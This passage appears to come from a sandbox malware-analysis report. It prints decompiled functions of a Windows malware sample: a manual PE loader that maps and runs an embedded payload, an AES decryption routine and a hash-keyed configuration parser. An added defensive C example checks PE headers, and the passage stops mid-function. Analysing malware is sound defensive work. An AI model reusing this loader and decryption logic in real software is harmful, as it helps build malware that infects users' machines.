                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: ComputerHeapName$AllocateFree
                                                    • String ID:
                                                    • API String ID: 187446995-0
                                                    • Opcode ID: d211b354ae1634f1f3b987242ce95ceae57510c5656100d7b6d3cbc207c49761
                                                    • Instruction ID: 5a91a2613d9f8801bda9cc72a15f284cae57b6bb8c770c96a3045a673d8d15c7
                                                    • Opcode Fuzzy Hash: d211b354ae1634f1f3b987242ce95ceae57510c5656100d7b6d3cbc207c49761
                                                    • Instruction Fuzzy Hash: AEF05436700206BAEF11D69A8C21EAF7AFCEBC5664F118199B995D3140EA71DE01A770
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E01091068(signed int __edx, intOrPtr _a4) {
                                                    				void* _t3;
                                                    				void* _t5;
                                                    				void* _t7;
                                                    				void* _t8;
                                                    				void* _t9;
                                                    				signed int _t10;
                                                    
                                                    				_t10 = __edx;
                                                    				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                                    				 *0x109a2d8 = _t3;
                                                    				if(_t3 == 0) {
                                                    					_t8 = 8;
                                                    					return _t8;
                                                    				}
                                                    				 *0x109a1c8 = GetTickCount();
                                                    				_t5 = E010913E8(_a4);
                                                    				if(_t5 == 0) {
                                                    					_t5 = E010928A7(_t9, _a4); // executed
                                                    					if(_t5 == 0) {
                                                    						if(E01096068(_t9) != 0) {
                                                    							 *0x109a300 = 1; // executed
                                                    						}
                                                    						_t7 = E01091C88(_t10); // executed
                                                    						return _t7;
                                                    					}
                                                    				}
                                                    				return _t5;
                                                    			}

                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,010918EE,?), ref: 01091071
                                                    • GetTickCount.KERNEL32 ref: 01091085
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CountCreateHeapTick
                                                    • String ID:
                                                    • API String ID: 2177101570-0
                                                    • Opcode ID: 62062c5990947d86b0a957b6e8ad9650c30f573bcdc5f55697762e2643cfe48c
                                                    • Instruction ID: 256bc58b5f2c7f99e7e3a3d582f20046da1f9b2a1ae6679bad3fa373e9fa68cf
                                                    • Opcode Fuzzy Hash: 62062c5990947d86b0a957b6e8ad9650c30f573bcdc5f55697762e2643cfe48c
                                                    • Instruction Fuzzy Hash: 3AF06D70744343AAEF712B74987971A36E47B94768F1082A9F9C4D6181EBB7C000BB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 34%
                                                    			E01093D20(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                    				intOrPtr _v12;
                                                    				void* _v18;
                                                    				char _v20;
                                                    				intOrPtr _t15;
                                                    				void* _t17;
                                                    				intOrPtr _t19;
                                                    				void* _t23;
                                                    
                                                    				_v20 = 0;
                                                    				asm("stosd");
                                                    				asm("stosd");
                                                    				asm("stosd");
                                                    				asm("stosw");
                                                    				_t15 =  *0x109a348; // 0xa6d5a8
                                                    				_t4 = _t15 + 0x109b3a0; // 0x1b08948
                                                    				_t20 = _t4;
                                                    				_t6 = _t15 + 0x109b124; // 0x650047
                                                    				_t17 = E01092E7B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                    				if(_t17 < 0) {
                                                    					_t23 = _t17;
                                                    				} else {
                                                    					_t23 = 8;
                                                    					if(_v20 != _t23) {
                                                    						_t23 = 1;
                                                    					} else {
                                                    						_t19 = E01096ADD(_t20, _v12);
                                                    						if(_t19 != 0) {
                                                    							 *_a16 = _t19;
                                                    							_t23 = 0;
                                                    						}
                                                    						__imp__#6(_v12);
                                                    					}
                                                    				}
                                                    				return _t23;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 01092E7B: SysFreeString.OLEAUT32(?), ref: 01092F5A
                                                      • Part of subcall function 01096ADD: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01091FB1,004F0053,00000000,?), ref: 01096AE6
                                                      • Part of subcall function 01096ADD: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01091FB1,004F0053,00000000,?), ref: 01096B10
                                                      • Part of subcall function 01096ADD: memset.NTDLL ref: 01096B24
                                                    • SysFreeString.OLEAUT32(00000000), ref: 01093D83
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeString$lstrlenmemcpymemset
                                                    • String ID:
                                                    • API String ID: 397948122-0
                                                    • Opcode ID: af9a8bc346ebbf9a45b25f4d3f0994a5e7f9206ba247b65e70adaf0f93f0623b
                                                    • Instruction ID: d56b46859cee1d60984e863c65dbc02430ad35941d425974c92feb4da15d809d
                                                    • Opcode Fuzzy Hash: af9a8bc346ebbf9a45b25f4d3f0994a5e7f9206ba247b65e70adaf0f93f0623b
                                                    • Instruction Fuzzy Hash: C0015E31501119BFDF51AFA8EC24EEEBBB8FB04650F008569FA85E7060E771A915DBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E00401876(void* __eax, intOrPtr _a4) {
                                                    
                                                    				 *0x403190 =  *0x403190 & 0x00000000;
                                                    				_push(0);
                                                    				_push(0x40318c);
                                                    				_push(1);
                                                    				_push(_a4);
                                                    				 *0x403188 = 0xc; // executed
                                                    				L004013E0(); // executed
                                                    				return __eax;
                                                    			}

                                                    APIs
                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401E7E,00000001,0040318C,00000000), ref: 00401894
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DescriptorSecurity$ConvertString
                                                    • String ID:
                                                    • API String ID: 3907675253-0
                                                    • Opcode ID: 5732e74c5c2bc5cc7433fa2932495c9ba70c003d5c64a67f7b80ff6ab26a808d
                                                    • Instruction ID: 53c4b3fbda59697ffe2b5d8dc5fefb1938645d4b8a10883f9f6efb7ebe52aea2
                                                    • Opcode Fuzzy Hash: 5732e74c5c2bc5cc7433fa2932495c9ba70c003d5c64a67f7b80ff6ab26a808d
                                                    • Instruction Fuzzy Hash: 14C04C74240300B7F6109F409D86F057E95775874AF60052EFA04391E1C3F95154952D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00401F0B(long _a4) {
                                                    				void* _t2;
                                                    
                                                    				_t2 = RtlAllocateHeap( *0x403160, 0, _a4); // executed
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
                                                    • Instruction ID: 3092cf90e7a1d4585fff80d284c7a06f71a0cf960e90f0812a630bad4f7f329e
                                                    • Opcode Fuzzy Hash: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
                                                    • Instruction Fuzzy Hash: 82B01271104200ABCA114F50DF08F067E21B798701F004030B304340B082710820FB1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004013E6(void* _a4) {
                                                    				char _t2;
                                                    
                                                    				_t2 = RtlFreeHeap( *0x403160, 0, _a4); // executed
                                                    				return _t2;
                                                    			}

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000030,00401165,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,004011ED), ref: 004013F2
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
                                                    • Instruction ID: 19babb2e5ad36de5e86cb2f69479443a556bd5f033cd34182d883786aa01e702
                                                    • Opcode Fuzzy Hash: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
                                                    • Instruction Fuzzy Hash: EBB01231004200ABDA114F50DF08F067F21B798701F008030B304740B082710920FB0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			// Manual PE mapper for the embedded payload: __eax points at the raw (unmapped) PE image.
                                                    			// Returns 0 on success, otherwise a Win32 error code.
                                                    			E004014DF(void* __eax) {
                                                    				char _v8;
                                                    				void* _v12;
                                                    				void* __edi;
                                                    				void* _t18;
                                                    				long _t24;
                                                    				long _t26;
                                                    				long _t29;
                                                    				intOrPtr _t40;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    				void* _t44;
                                                    
                                                    				_t41 = __eax;
                                                    				_t16 =  *0x403180; // per-build seed used in the hashing below
                                                    				// *(*(image + 0x3c) + image + 0x50) is OptionalHeader.SizeOfImage of the raw image (e_lfanew + 0x50).
                                                    				// The trailing "x - 0x69b24f45 & !(x - 0x69b24f45)" is an opaque predicate the decompiler left
                                                    				// unsimplified (t & ~t == 0 for any t), so the value passed on is SizeOfImage unchanged.
                                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
                                                    				// E004013FB resolves the imports it needs through GetModuleHandleA/GetProcAddress (see APIs below),
                                                    				// leaves the mapping destination in _v8 (used as the new image base) and a table of resolved
                                                    				// functions in _v12; a non-zero return means failure.
                                                    				_t18 = E004013FB( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                    				if(_t18 != 0) {
                                                    					_t29 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                    					goto L8;
                                                    				} else {
                                                    					_t40 = _v8;
                                                    					_t29 = E00401583(_t33, _t40, _t41); // (size, destination, source): presumably maps the raw image into the new base; body not on this page
                                                    					if(_t29 == 0) {
                                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; // IMAGE_NT_HEADERS of the mapped copy
                                                    						_t24 = E0040171E(_t40, _t44); // executed; import resolution (calls LoadLibraryA, see APIs below)
                                                    						_t29 = _t24;
                                                    						if(_t29 == 0) {
                                                    							_t26 = E00401A88(_t44, _t40); // executed; applies section protections with VirtualProtect (see APIs below)
                                                    							_t29 = _t26;
                                                    							if(_t29 == 0) {
                                                    								_push(_t26); // lpReserved (0 on this path)
                                                    								_push(1);    // DLL_PROCESS_ATTACH
                                                    								_push(_t40); // hinstDLL = new image base
                                                    								// base + OptionalHeader.AddressOfEntryPoint (PE + 0x28): the mapped module's entry point is called like DllMain
                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                    									_t29 = GetLastError();
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					_t42 = _v12;
                                                    					// tear down the helper table: call slot 0x18 on the result of slot 0x1c(*table), then free the table
                                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                    					E004013E6(_t42); // RtlFreeHeap wrapper shown above
                                                    					L8:
                                                    					return _t29;
                                                    				}
                                                    			}
                                                    Instruction addresses: 0x004014e7, 0x004014e9, 0x00401505, 0x00401516, 0x0040151d, 0x0040157b, 0x00000000, 0x0040151f, 0x0040151f, 0x00401529, 0x0040152d, 0x00401532, 0x00401535, 0x0040153a, 0x0040153e, 0x00401543, 0x00401548, 0x0040154c, 0x00401551, 0x00401552, 0x00401556, 0x0040155b, 0x00401563, 0x00401563, 0x0040155b, 0x0040154c, 0x0040153e, 0x00401565, 0x0040156e, 0x00401572, 0x0040157c, 0x00401582, 0x00401582

                                                    APIs
                                                      • Part of subcall function 004013FB: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,0040151B,?,?,?,?,?,00000002,?,?), ref: 0040141F
                                                      • Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401441
                                                      • Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401457
                                                      • Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 0040146D
                                                      • Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401483
                                                      • Part of subcall function 004013FB: GetProcAddress.KERNEL32(00000000,?), ref: 00401499
                                                      • Part of subcall function 0040171E: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401756
                                                      • Part of subcall function 00401A88: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401AC1
                                                      • Part of subcall function 00401A88: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401B36
                                                      • Part of subcall function 00401A88: GetLastError.KERNEL32 ref: 00401B3C
                                                    • GetLastError.KERNEL32(?,?), ref: 0040155D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                                                    • String ID:
                                                    • API String ID: 3135819546-0
                                                    • Opcode ID: 938c4a15b1895a26e866699c751ff346a7f2e10a773ba6817d8333fad46ba47a
                                                    • Instruction ID: 88a4bd3449c07186c518bb40649dcadd21006ef22d6474a662c7794d1a494191
                                                    • Opcode Fuzzy Hash: 938c4a15b1895a26e866699c751ff346a7f2e10a773ba6817d8333fad46ba47a
                                                    • Instruction Fuzzy Hash: C511E976600701BBD721AAA58C81DAB77ACAFC8354700013FEE02BB691EEB4ED058794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
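The loader stub E004014DF above takes two optional-header fields on trust: SizeOfImage at PE+0x50 and AddressOfEntryPoint at PE+0x28, reached through e_lfanew at 0x3c. The following is an added example, not code from the sample or from this Joe Sandbox report: it reads the same two fields from a constructed, minimal PE32 header with the bounds and signature checks the stub omits, and shows that the unsimplified term "(x - 0x69b24f45) & !(x - 0x69b24f45)" in the decompiled stub is an opaque predicate that always evaluates to zero. The sample header bytes and the helper names are this example's own assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define E_LFANEW_OFF       0x3c   /* IMAGE_DOS_HEADER.e_lfanew */
#define PE_MAGIC_OFF       0x18   /* OptionalHeader.Magic: 4-byte "PE\0\0" + 20-byte IMAGE_FILE_HEADER */
#define PE_ENTRY_OFF       0x28   /* OptionalHeader.AddressOfEntryPoint, read at the call in E004014DF */
#define PE_SIZEOFIMAGE_OFF 0x50   /* OptionalHeader.SizeOfImage, read at the top of E004014DF */
#define PE32_MAGIC         0x10b

struct pe_fields {
    uint32_t entry_rva;
    uint32_t size_of_image;
};

/* Little-endian accessors, safe for unaligned header fields. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Reads the fields the stub uses, rejecting images the stub would dereference
 * out of bounds. Returns 0 on success, -1 otherwise. */
int pe_read_loader_fields(const uint8_t *img, size_t len, struct pe_fields *out)
{
    if (len < E_LFANEW_OFF + 4 || img[0] != 'M' || img[1] != 'Z')
        return -1;
    uint32_t pe = rd32(img + E_LFANEW_OFF);
    /* the stub adds e_lfanew to the image pointer unchecked */
    if (pe > len || len - pe < PE_SIZEOFIMAGE_OFF + 4)
        return -1;
    if (memcmp(img + pe, "PE\0\0", 4) != 0)
        return -1;
    if ((rd32(img + pe + PE_MAGIC_OFF) & 0xffffu) != PE32_MAGIC)
        return -1;                                   /* PE32+ lays the optional header out differently */
    out->entry_rva     = rd32(img + pe + PE_ENTRY_OFF);
    out->size_of_image = rd32(img + pe + PE_SIZEOFIMAGE_OFF);
    /* the stub calls base + AddressOfEntryPoint without this check */
    if (out->entry_rva >= out->size_of_image)
        return -1;
    return 0;
}

/* Opaque predicate left unsimplified by the decompiler in E004014DF:
 * (seed - 0x69b24f45) & ~(seed - 0x69b24f45). t & ~t is 0 for every t. */
uint32_t opaque_zero(uint32_t seed)
{
    uint32_t t = seed - 0x69b24f45u;
    return t & ~t;
}

/* Constructed sample image (assumption): only the header bytes the parser touches. */
#define SAMPLE_LEN 0x100
#define SAMPLE_PE  0x80
static void build_sample_image(uint8_t *buf)
{
    memset(buf, 0, SAMPLE_LEN);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + E_LFANEW_OFF, SAMPLE_PE);
    memcpy(buf + SAMPLE_PE, "PE\0\0", 4);
    buf[SAMPLE_PE + PE_MAGIC_OFF]     = 0x0b;        /* PE32 magic 0x10b, little-endian */
    buf[SAMPLE_PE + PE_MAGIC_OFF + 1] = 0x01;
    wr32(buf + SAMPLE_PE + PE_ENTRY_OFF, 0x1000);
    wr32(buf + SAMPLE_PE + PE_SIZEOFIMAGE_OFF, 0x6000);
}

uint32_t sample_entry_rva(void)
{
    uint8_t buf[SAMPLE_LEN]; struct pe_fields f;
    build_sample_image(buf);
    return pe_read_loader_fields(buf, SAMPLE_LEN, &f) == 0 ? f.entry_rva : 0;
}
uint32_t sample_size_of_image(void)
{
    uint8_t buf[SAMPLE_LEN]; struct pe_fields f;
    build_sample_image(buf);
    return pe_read_loader_fields(buf, SAMPLE_LEN, &f) == 0 ? f.size_of_image : 0;
}
/* A buffer cut off before the optional header must be rejected, not read past. */
int sample_truncated_rejected(void)
{
    uint8_t buf[SAMPLE_LEN]; struct pe_fields f;
    build_sample_image(buf);
    return pe_read_loader_fields(buf, SAMPLE_PE + 0x10, &f) == -1;
}

int main(void)
{
    printf("AddressOfEntryPoint=0x%x SizeOfImage=0x%x truncated_rejected=%d opaque=%u\n",
           sample_entry_rva(), sample_size_of_image(), sample_truncated_rejected(),
           opaque_zero(0x69b24f45u));
    return 0;
}
```

The same offsets apply when carving the payload out of the 0x400000 memory dump referenced below: e_lfanew, then PE+0x28 and PE+0x50 give the entry point and mapped size that the stub passes to its mapping and protection helpers.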

                                                    C-Code - Quality: 75%
                                                    			// Runs a buffer of length _a8 through the CryptoAPI key/IV session set up by E010952F6
                                                    			// (see APIs below: CryptAcquireContextW with PROV_RSA_AES (0x18) and CRYPT_VERIFYCONTEXT
                                                    			// (0xF0000000), a 16-byte key imported from a 0x1C-byte blob, which is the size of a
                                                    			// PLAINTEXTKEYBLOB carrying a 16-byte key, and CryptSetKeyParam with KP_IV (1)).
                                                    			// Returns the heap buffer holding the result, or 0 on failure.
                                                    			E01095DB1(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                    				void* _t13;
                                                    				void* _t21;
                                                    
                                                    				_t11 =  &_a4;
                                                    				_t21 = 0;
                                                    				__imp__( &_a8); // lstrlen (see APIs below)
                                                    				_t13 = E010952F6( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed; key and IV setup, 0 on success
                                                    				if(_t13 == 0) {
                                                    					_t21 = E01096A51(_a8 + _a8); // RtlAllocateHeap wrapper: output buffer of twice the input length
                                                    					if(_t21 != 0) {
                                                    						E01093215(_a4, _t21, _t23); // _t23 is an unresolved decompiler temporary; body not on this page
                                                    					}
                                                    					E0109692B(_a4);
                                                    				}
                                                    				return _t21;
                                                    			}
                                                    Instruction addresses: 0x01095db9, 0x01095dc0, 0x01095dc2, 0x01095dd1, 0x01095dd8, 0x01095de7, 0x01095deb, 0x01095df2, 0x01095df2, 0x01095dfa, 0x01095dff, 0x01095e04

                                                    APIs
                                                    • lstrlen.KERNEL32(00000000,00000000,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 01095DC2
                                                      • Part of subcall function 010952F6: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01095DD6,00000001,0109384E,00000000), ref: 0109532E
                                                      • Part of subcall function 010952F6: memcpy.NTDLL(01095DD6,0109384E,00000010,?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740), ref: 01095347
                                                      • Part of subcall function 010952F6: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01095370
                                                      • Part of subcall function 010952F6: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01095388
                                                      • Part of subcall function 010952F6: memcpy.NTDLL(00000000,775EC740,01B09600,00000010), ref: 010953DA
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                    • String ID:
                                                    • API String ID: 894908221-0
                                                    • Opcode ID: 14458ad181fc80a901b6d6ed1bef6031ad895ece23b6e1acb709a995dda3e229
                                                    • Instruction ID: ed7d0d77fb13fc60ddf21b2b936cb9b98d12d518e3d543a5f6ea26ac20fdb499
                                                    • Opcode Fuzzy Hash: 14458ad181fc80a901b6d6ed1bef6031ad895ece23b6e1acb709a995dda3e229
                                                    • Instruction Fuzzy Hash: FBF08936100109BBCF126F56DC14DEF3FADEF95754F008022FD59CA014DA32DA55ABA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			// Configuration parser. Every setting is located by a name hash derived from the per-build
                                                    			// seed at 0x109a344 (0x69b25f44) XORed with a constant: E010964ED fetches a named blob,
                                                    			// E01096FA8 fetches a field from the blob in _t102, StrToIntExA parses numeric fields into
                                                    			// globals, and E01095D66 produces string fields (its result replaces the built-in default
                                                    			// strings below). Returns 0 on success, or 2 (ERROR_FILE_NOT_FOUND) when the main blob is absent.
                                                    			E01097596(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				int _v8;
                                                    				void* _v12;
                                                    				void* _v16;
                                                    				signed int _t28;
                                                    				signed int _t33;
                                                    				signed int _t39;
                                                    				char* _t45;
                                                    				char* _t46;
                                                    				char* _t47;
                                                    				char* _t48;
                                                    				char* _t49;
                                                    				char* _t50;
                                                    				void* _t51;
                                                    				void* _t52;
                                                    				void* _t53;
                                                    				intOrPtr _t54;
                                                    				void* _t56;
                                                    				intOrPtr _t57;
                                                    				intOrPtr _t58;
                                                    				signed int _t61;
                                                    				intOrPtr _t64;
                                                    				signed int _t65;
                                                    				signed int _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				signed int _t75;
                                                    				signed int _t78;
                                                    				signed int _t82;
                                                    				signed int _t86;
                                                    				signed int _t90;
                                                    				signed int _t94;
                                                    				signed int _t98;
                                                    				void* _t101;
                                                    				void* _t102;
                                                    				void* _t116;
                                                    				void* _t119;
                                                    				intOrPtr _t122;
                                                    
                                                    				_t119 = __esi;
                                                    				_t116 = __edi;
                                                    				_t104 = __ecx;
                                                    				_t101 = __ebx;
                                                    				_t28 =  *0x109a344; // 0x69b25f44
                                                    				if(E010964ED( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                    					 *0x109a374 = _v8;
                                                    				}
                                                    				_t33 =  *0x109a344; // 0x69b25f44
                                                    				if(E010964ED( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                    					_v12 = 2; // ERROR_FILE_NOT_FOUND: main configuration blob absent
                                                    					L69:
                                                    					return _v12;
                                                    				}
                                                    				_t39 =  *0x109a344; // 0x69b25f44
                                                    				_push(_t116);
                                                    				if(E010964ED( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                    					L67:
                                                    					HeapFree( *0x109a2d8, 0, _v16);
                                                    					goto L69;
                                                    				} else {
                                                    					_push(_t101);
                                                    					_t102 = _v12;
                                                    					if(_t102 == 0) {
                                                    						_t45 = 0;
                                                    					} else {
                                                    						_t98 =  *0x109a344; // 0x69b25f44
                                                    						_t45 = E01096FA8(_t104, _t102, _t98 ^ 0x7895433b);
                                                    					}
                                                    					_push(_t119);
                                                    					if(_t45 != 0) {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                    							 *0x109a2e0 = _v8;
                                                    						}
                                                    					}
                                                    					if(_t102 == 0) {
                                                    						_t46 = 0;
                                                    					} else {
                                                    						_t94 =  *0x109a344; // 0x69b25f44
                                                    						_t46 = E01096FA8(_t104, _t102, _t94 ^ 0x219b08c7);
                                                    					}
                                                    					if(_t46 != 0) {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                    							 *0x109a2e4 = _v8;
                                                    						}
                                                    					}
                                                    					if(_t102 == 0) {
                                                    						_t47 = 0;
                                                    					} else {
                                                    						_t90 =  *0x109a344; // 0x69b25f44
                                                    						_t47 = E01096FA8(_t104, _t102, _t90 ^ 0x31fc0661);
                                                    					}
                                                    					if(_t47 != 0) {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                    							 *0x109a2e8 = _v8;
                                                    						}
                                                    					}
                                                    					if(_t102 == 0) {
